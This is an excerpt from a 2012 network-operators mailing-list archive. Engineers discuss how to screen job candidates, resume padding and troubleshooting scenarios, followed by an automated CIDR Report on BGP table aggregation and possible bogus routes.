<86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Fri, Jul 6, 2012 at 4:43 PM, Steven Noble wrote: > On Jul 6, 2012, at 4:16 PM, George Herbert wrote: > >> 6) Puffed it up a little (worked with Cisco routers, but in the 7200 >> era, and hasn't categorized skills as recent / older), but hasn't >> outright lied. > > The 7200 is still a heavily used platform today. ?It has no correlation with current skill sets IMHO. Would s/7200/2500/g be an adequate correction? I know of customers who still have 7200s as well, but in the context of ISP network engineering... Perhaps I'm wrong, but my impression is people on this list have generally moved on by now. Context matters. One can always point to lingering examples of older technology (if nowhere else, the Computer History Museum 8-). The question is whether the skill is relevant in context. I built a nationwide T-1 backbone out of Livingston IRXes once (in the early 90s) - the IRX left my resume by the late 1990s. I know of at least one still humming away in a closet, but it's not a relevant technology. I also learned (some) shell commands on a Vax 11/750 when they were new and used Apple II's when they were new, and so on. None of these are resume-appropriate now, unless I want a job at the Computer History Museum. If people don't bother to clean up the resume, either they don't understand what's relevant now, or they don't care, or they're trying to hide something. -- -george william herbert george.herbert at gmail.com From egon at egon.cc Fri Jul 6 19:45:28 2012 From: egon at egon.cc (James Downs) Date: Fri, 6 Jul 2012 17:45:28 -0700 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net> References: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <0D616ED5-0DB4-4DD2-A52C-7573637AC693@egon.cc> On Jul 6, 2012, at 1:50 PM, Dan Golding wrote: > This happens all the time. Not saying Netflix is doing this, but lots of other folks are. It?s a trap that?s easy to fall into. Especially with Netflix did the reverse. The moved *to* Amazon, so they could do "noops". From ben at meh.net.nz Fri Jul 6 19:51:55 2012 From: ben at meh.net.nz (Ben Aitchison) Date: Sat, 7 Jul 2012 12:51:55 +1200 Subject: job screening question In-Reply-To: <20120706061821.GU2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> Message-ID: <20120707005155.GA14111@meh.net.nz> On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: > On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > > > > --- jason at thebaughers.com wrote: > > From: Jason Baugher > > > > Geez, I'd be happy to find someone with a good attitude, a solid work > > ethic, and the desire and aptitude to learn. :) > > --------------------------------------- > > > > > > Yeah, that. But how do you get those folks through the HR > > process to you, so you can decipher their skill/work ethic > > level? What can the HR person ask to find out if someone > > has these qualities? OSPF LSA type questions will not help. > > Don't get HR to do that sort of screening. They suck mightily at it. I > lack any sort of HR department to get in the way, and I'm glad of it -- I > don't see the value in having someone who doesn't know anything about the > job get in the way of finding the right person for it. Sure, get 'em to do > the scutwork of posting job ads, collating resumes, scheduling things and > sending the "lolz no!" responses, but actually filtering? Nah, I'll do that > bit thanks. If you have to have HR do a filter call, make it *really* > simple, like "What does TCP stand for?" -- sadly, you'll still probably > filter out half the applicants for a senior position... I've noticed a strong correlation between people who don't know what acronyms stand for, and competence. People who don't know anything try and figure out what the acronym stands for - people who want to understand things see it as just a place holder. Myself, I'm stumbling.. is TCP like GNU (GNU's Not Unix) and someting like TCP Control Protocol. Or is it Transmission Contrl Protocol? Or is it something else all together. Really at the end of the day - it doesn't matter. Maybe it's more significant to ask what the difference between TCP and UDP is. One thing people seem to like to bring up again and again is subnetting questions, which to me seem quite simple on the surface - but can get a little more complicated. Like when you have a /24 subnet routed to a customer, how many IP addresses can they use? 254? 253? To my thinking - if it's a routed subnet that means the gateway is on a different address, and it'd be prudent to still have the double broadcast addresses. It is also possible to utilise all 256 addresses. I think where the most significant differences lie isn't in how people can answer verbal or written questions with simple problems but in how quickly people can diagnose complicated of confusing situations. Although often there are steps people can take to mitigate against such, things like foreign DHCP server on the network. Someone stealing the gateway's IP address leading to intermittent connectivity, but still being able to ping the gateway, and other hosts on the network just not outside the network some of the time. Routing loops, incorrect subnet masks. (like when people stick a /24 netmask on a /27 then can't reach another adjacent /27) I think that anyone reasonable competent should be able to figure these things out - but by seeing how they approach these things, how quickly they can diagnose, and fix, and what level of disruption they cause trying to fix the problem are all significant. Like in the someone stealing gateway address - say there's a file server, printer etc on the local subnet, and people are busy working, then it's probably better not being able to access the larger network, and to keep the local connectivity, but some people seem to have the idea when things aren't working quite right that it's ok to disrupt what is working right. Ben. From snoble at sonn.com Fri Jul 6 20:22:37 2012 From: snoble at sonn.com (Steven Noble) Date: Fri, 6 Jul 2012 18:22:37 -0700 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Jul 6, 2012, at 5:04 PM, George Herbert wrote: > On Fri, Jul 6, 2012 at 4:43 PM, Steven Noble wrote: >> On Jul 6, 2012, at 4:16 PM, George Herbert wrote: >> >>> 6) Puffed it up a little (worked with Cisco routers, but in the 7200 >>> era, and hasn't categorized skills as recent / older), but hasn't >>> outright lied. >> >> The 7200 is still a heavily used platform today. It has no correlation with current skill sets IMHO. > > Would s/7200/2500/g be an adequate correction? > > I know of customers who still have 7200s as well, but in the context > of ISP network engineering... Perhaps I'm wrong, but my impression is > people on this list have generally moved on by now. > > Context matters. One can always point to lingering examples of older > technology (if nowhere else, the Computer History Museum 8-). The > question is whether the skill is relevant in context. > > I built a nationwide T-1 backbone out of Livingston IRXes once (in the > early 90s) - the IRX left my resume by the late 1990s. I know of at > least one still humming away in a closet, but it's not a relevant > technology. I also learned (some) shell commands on a Vax 11/750 when > they were new and used Apple II's when they were new, and so on. None > of these are resume-appropriate now, unless I want a job at the > Computer History Hi George, I sent the message too soon :( I meant to say more about how the equipment is not as important as the drive and willingness to work with what you have. I have talked to companies who have job openings many months old for people who absolutely exist in the silicon valley. The hiring company just thinks the people who apply are over or under qualified. All of the great coders, engineers, etc started somewhere. The main thing that separates them from the posers and acronym namers is the willingness to grow, learn and dig in. I like people who run 2500s in their house, or dd-wrt. It shows they are willing to try something and learn. From jared at puck.nether.net Fri Jul 6 20:24:40 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 6 Jul 2012 21:24:40 -0400 Subject: job screening question In-Reply-To: <20120707005155.GA14111@meh.net.nz> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> Message-ID: Die proxy arp die. (and that's not German). I've had a job or consulting gig or two that has inadvertently had this as the hidden glue making things work. (wha, you can't route that subnet out an Ethernet interface without a next hop? It's always worked....) I fight with sysadmins to this day about the concept of a broadcast domain and subnet... If I hear another case of someone saying that switch is the "80" subnet when there are 3 co-existing /24s in that domain I may go crazy.... I've cleaned up a lot of poor host and network management and it's amazing how much a difference the hardware operates without the hacks. Jared Mauch On Jul 6, 2012, at 8:51 PM, Ben Aitchison wrote: > Routing loops, incorrect > subnet masks. (like when people stick a /24 netmask on a /27 then can't reach another > adjacent /27) From valdis.kletnieks at vt.edu Fri Jul 6 20:32:04 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 21:32:04 -0400 Subject: job screening question In-Reply-To: Your message of "Fri, 06 Jul 2012 17:04:16 -0700." References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: <35910.1341624724@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 17:04:16 -0700, George Herbert said: > If people don't bother to clean up the resume, either they don't > understand what's relevant now, or they don't care, or they're trying > to hide something. OK. I admit it. My resume still lists that I spent a few years hacking assembler code for OS/VS1 and HASP 30 years ago. But it's there as one endpoint, that wanders from there, to IBM's VM, to SunOS, and Sendmail, some AIX and 8 or 9 other Unix flavors (anybody else remember UTX/32? If so, we need to share a few beers and swap stories:), computer security, to supporting SGI virtual reality systems in the late 90s (IR2 graphics pipes, woo-hoo), to Linux (my code is in every Android phone out there. OK, only a few dozen lines, but still ;), helped build a top-5 supercomputer and a few other things along the way, and now I mostly do high-performance storage infrastructure. Oh, and a paper in the IEEE Transactions on Nuclear Science along the line. ;) So no. OS/VS1 isn't relevant now. What *is* relevant now is that I have 3 decades of experience at being tossed new stuff by the boss and getting up to speed on it fast. The day my boss walks into my office and says "We've got this new..." and I'm unable to get up to speed on it faster than anybody else in the shop is the day it's time for me to retire. ;) So the OS/VS1 reference stays. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From ben at meh.net.nz Fri Jul 6 20:33:54 2012 From: ben at meh.net.nz (Ben Aitchison) Date: Sat, 7 Jul 2012 13:33:54 +1200 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> Message-ID: <20120707013354.GB14111@meh.net.nz> On Fri, Jul 06, 2012 at 09:19:48AM -0500, Matt Chung wrote: > A former manager of mine once told me you can gauge a persons understanding > by the questions they ask and I personally agree with this statement. Most > of us will be able to make a reasonable assessment of the person by > listening to the content of their questions. I'm not looking for an > immediate resolution, but trying to understand the thought process of the > individual. I feel realistic scenarios provide some insight on the > individual's analytical skills. > > "A client cannot access the website "http://xyz.com". What do you do to > troubleshoot this issue?" it's blocking icmp echo.. dns works.. with multiple regional dns servers.. the page loads for me.. has a modern tcp/ip stack, probably linux judging by an initial window size of 14600 .. hosted on amazon web services... I'd imagine that they're unlikely to be blocking icmp totally.. and just the echo.. but there's still that possibility... (yeah I know it's just an example) > Depending on the candidate, I've seen a variety of answers: > 1) "Can you ping the device?" > 2) "Can you access the gateway?" > 3) "What does the running config look like on the router" > 4) "Is there a firewall in between" heh,.. think i've been on the internet too long. i think from the destination site not working and what could be wrong with it.. then work my way back to the client. of course i completely skipped in my thinking that maybe other sites don't work too, and that there could be malware... and i didn't actually try going to the site with anything other than curl... i suppose a big part of that particular problem is figuring out if it's at their end - a greater problem - or an actual problem getting to the site. > I believe these questions may be asked in the right context provided there > is enough information to isolate the issue to the network however the > statement is devoid of anything useful that would make the network suspect. > I would like to hear some questions such as: > > "are other websites accessible? Or is the only website the client is > experiencing issues with?" > "was the website working previously? when did it start happening?" > "what does the client see on their screen ? are they getting an error?" yeah that's a good idea :) my order is probably assuming there may be a more complicated issue, when it could be a simple problem, which actually seems to be quite common from what i've experienced with technical people. oh! the network cable was unplugged! > These questions reflect the persons ability to accurately understand the > problem before deep diving into the technical details. From there, you can > get more technical. "Client is receiving an HTTP 404 error." Great, rule > out network since this is an application layer response... Some of those type problems have got a lot more complicated. Like - that could be a transparent proxy caching an HTTP 404... or the web site could be hosted in multiple locations and not syncing between them properly, which could still require some level of debugging.. or someone somehow managed to advertise the hosts subnet with a more preferred route, then doesn't have the content. Or say someone's decided to do something fancy like give different IP's back from DNS but giving internal IP addresses back to the local farm.. but they've decided to use Amazon DNS servers.. and set them to give IP .. but the customer happens to be using Amazon DNS servers because they're hosting a web site on Amazon, and for some reason thought it'd be a good idea.. and then the internal IP address of course doesn't have the content. I suppose that's still application level to some points of view. It doesn't make the site magically work though, or figure out what's causing it. Also from my experience, I don't tend to find out one website's not working unless it is working on/off or for other people, and the most common situation seems to be some kind of load balancing with one mirror not working, and I find it helpful to check from a few locations. And sometimes doing dns lookups, on multiple DNS servers, and seeing a different IP and using curl -x :80 seems to be the easiest way to check this. But that's assuming a transparent proxied network, which tends to mean MTU issues show up as instead "banking web sites aren't working". Which can show up sometimes when people change routers to one not doing MSS-clamping, and operate at 1492 MTU... The issue is significant enough, and the problem hard enough for helpdesk type people to diagnose that it's common for MSS clamping to be set at a network level for networks with a significant amount of people with < 1500 MTU. Ben. From bill at herrin.us Fri Jul 6 20:36:47 2012 From: bill at herrin.us (William Herrin) Date: Fri, 6 Jul 2012 21:36:47 -0400 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Fri, Jul 6, 2012 at 9:22 PM, Steven Noble wrote: > I have talked to companies who have job openings many > months old for people who absolutely exist in the silicon > valley. The hiring company just thinks the people who > apply are over or under qualified. I thought someone was overqualified once. My decision was overridden. I turned out to be very glad it was. He didn't fit the role I thought I needed but I was able to turn him loose with minimal supervision. And I was able to go on vacation. :) That was so much more valuable. Now I know: tell the candidate about the work, all the work not just the job you thought you would hire for, and let him tell you whether any of it is beneath him. As long as you get all the skills you need on the team you can juggle the tasking. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From bill at herrin.us Fri Jul 6 20:45:15 2012 From: bill at herrin.us (William Herrin) Date: Fri, 6 Jul 2012 21:45:15 -0400 Subject: job screening question In-Reply-To: <20120707005155.GA14111@meh.net.nz> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> Message-ID: On Fri, Jul 6, 2012 at 8:51 PM, Ben Aitchison wrote: > Like when you have a /24 subnet routed to a customer, how many IP > addresses can they use? 254? 253? To my thinking - if it's a routed subnet that > means the gateway is on a different address, and it'd be prudent to still have the > double broadcast addresses. It is also possible to utilise all 256 addresses. There can be hidden down sides to trying that. I tried to use all 17 addresses from my Cox Business Internet /28 (the 16 in the /28 and the "router's" external address). Rigged it as a /24 inside and used proxy arp to move the outside addresses back out including the fake .1 default gateway that the router offered arp for but didn't hold. Only the first 16 of the 17 addresses worked. Which 16? Why, the first 16 the cable modem saw a packet from after power-on. Made for some interesting debugging. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From dougb at dougbarton.us Fri Jul 6 21:09:54 2012 From: dougb at dougbarton.us (Doug Barton) Date: Fri, 06 Jul 2012 19:09:54 -0700 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: <4FF79A72.5030707@dougbarton.us> On 07/06/2012 16:16, George Herbert wrote: > On Fri, Jul 6, 2012 at 4:07 PM, Nick Hilliard wrote: >> On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote: >>> The Friday afternoon cynic in me says it's because it's a move with positive >>> paybacks. There's 3 basic possibilities: >>> >>> 1) You send the puffed resume to a company with clue, it gets recognized >>> as puffed, and you don't get the job. Zero loss, you weren't going to get >>> that job anyhow. >>> >>> 2) You send a boring unpuffed resume to a company sans clue. They recognize it >>> as boring because there's only 3 buzzwords on 2 pages, and you don't get the >>> job. Loss. >>> >>> 3) You send a puffed resume, and the guy doing the hiring doesn't know what >>> the 3-packet mating call of the Internet is *either*. Win. >> >> or: >> >> 4) you get caught out in the interview as being puffed up, but the company >> hires you anyway despite strongly worded objections from the interviewer, >> causing the interviewer's eyes to spin in their sockets at the inanity of >> the decision. You then spend your entire employment at the company proving >> your ineptitude beyond all possible doubt. >> >> I think this is a win, is it? > > There's also > > 5) Didn't have enough clue about the real world to know you were > puffing your resume up. > > 6) Puffed it up a little (worked with Cisco routers, but in the 7200 > era, and hasn't categorized skills as recent / older), but hasn't > outright lied. 7) Were the beneficiary of some professional resume service/headhunter. "You know how to spell 'aych-tee-tee-pee'? Let's list that!" -- If you're never wrong, you're not trying hard enough From cidr-report at potaroo.net Fri Jul 6 17:00:00 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 6 Jul 2012 22:00:00 GMT Subject: The Cidr Report Message-ID: <201207062200.q66M00cC029187@wattle.apnic.net> This report has been generated at Fri Jul 6 21:12:59 2012 AEST. The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table. Check http://www.cidr-report.org for a current version of this report. Recent Table History Date Prefixes CIDR Agg 29-06-12 417364 242261 30-06-12 417376 242216 01-07-12 417290 242354 02-07-12 417365 242609 03-07-12 417797 242417 04-07-12 418052 242290 05-07-12 417636 242405 06-07-12 418603 242676 AS Summary 41592 Number of ASes in routing system 17374 Number of ASes announcing only one prefix 3392 Largest number of prefixes announced by an AS AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc. 113090528 Largest address span announced by an AS (/32s) AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 06Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 418725 242599 176126 42.1% All ASes AS6389 3392 191 3201 94.4% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS7029 3281 1631 1650 50.3% WINDSTREAM - Windstream Communications Inc AS22773 1656 136 1520 91.8% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS4766 2694 1240 1454 54.0% KIXS-AS-KR Korea Telecom AS17974 2146 762 1384 64.5% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS18566 2088 706 1382 66.2% COVAD - Covad Communications Co. AS28573 1989 621 1368 68.8% NET Servicos de Comunicao S.A. AS2118 1288 15 1273 98.8% RELCOM-AS OOO "NPO Relcom" AS4323 1576 386 1190 75.5% TWTC - tw telecom holdings, inc. AS1785 1932 813 1119 57.9% AS-PAETEC-NET - PaeTec Communications, Inc. AS10620 1983 884 1099 55.4% Telmex Colombia S.A. AS4755 1612 561 1051 65.2% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS7303 1453 458 995 68.5% Telecom Argentina S.A. AS7552 1124 234 890 79.2% VIETEL-AS-AP Vietel Corporation AS8151 1498 686 812 54.2% Uninet S.A. de C.V. AS18101 946 160 786 83.1% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 827 60 767 92.7% TCISL Tata Communications AS4808 1100 352 748 68.0% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 887 162 725 81.7% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS3356 1105 462 643 58.2% LEVEL3 Level 3 Communications AS855 694 57 637 91.8% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. AS17676 692 75 617 89.2% GIGAINFRA Softbank BB Corp. AS4780 841 245 596 70.9% SEEDNET Digital United Inc. AS22561 1023 428 595 58.2% DIGITAL-TELEPORT - Digital Teleport Inc. AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online LLC AS24560 1036 448 588 56.8% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS8452 1222 665 557 45.6% TE-AS TE-AS AS3549 991 436 555 56.0% GBLX Global Crossing Ltd. AS4804 649 97 552 85.1% MPX-AS Microplex PTY LTD Total 43562 13499 30063 69.0% Top 30 total Possible Bogus Routes 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 120.136.17.0/24 AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.33.40.0/24 AS11172 Alestra, S. de R.L. de C.V. 200.34.0.0/20 AS6342 Instituto Tecnol?gico y de Estudios Superiores de Monterrey 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.155.176.0/20 AS16706 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From cidr-report at potaroo.net Fri Jul 6 17:04:32 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 6 Jul 2012 22:04:32 GMT Subject: BGP Update Report Message-ID: <201207062204.q66M4WIi029804@wattle.apnic.net> BGP Update Report Interval: 28-Jun-12 -to- 05-Jul-12 (7 days) 